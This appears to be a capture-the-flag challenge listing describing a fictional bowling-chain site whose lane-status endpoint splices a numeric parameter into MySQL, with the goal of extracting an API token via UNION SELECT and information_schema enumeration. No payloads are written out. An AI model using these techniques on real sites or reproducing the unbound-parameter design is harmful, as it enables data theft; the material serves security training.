LaneFive
A regional bowling chain's lane-availability check was wired up in 2019 by a contractor who'd never worked outside restaurant POS sites. The same database holds more than lane rows.
The Scenario
Hometown Bowl's website was rebuilt in 2019 on a basic Node + MySQL stack
by a contractor who specialized in restaurant POS sites — a portfolio
shop, a one-week turnaround, no security review. The lane-availability
check was a one-off endpoint bolted onto the homepage: a lane number in,
a row out, render it. The integration config for the rest of the
business sits in the same database because the contractor saw no reason
to set up a second one for a four-alley chain.
Challenge Intel
Synopsis
Hometown Bowl's lane availability check accepts a lane number in a query string and splices it into SQL. UNION to MySQL's metadata and pull an API token from an internal key/value table.
What It Is
Hometown Bowl runs a small regional chain of bowling alleys with online lane reservations. The check-availability endpoint at /lane-status accepts a lane number in the URL, looks up that row in the lanes table, and renders four columns: name, capacity, bumpers, hourly rate. The numeric parameter is spliced into the SELECT without binding — typical "it's just a number, no quotes needed" mistake. The internal key/value config table is in the same database. The integration API token is one of the rows in it.
Who It's For
Players comfortable with quote-breaking SQLi who want to practice numeric-context injection and MySQL-flavored UNION extraction.
Skills You'll Practice
- Numeric-context SQLi (no quotes to break)
- MySQL UNION SELECT syntax (no FROM-dual workaround needed)
- Database version disclosure via @@version
- information_schema.tables enumeration
- Extracting from a non-search key-value table
What You'll Gain
- Reflex for numeric-context injection points
- Comfort using MySQL information_schema for table enumeration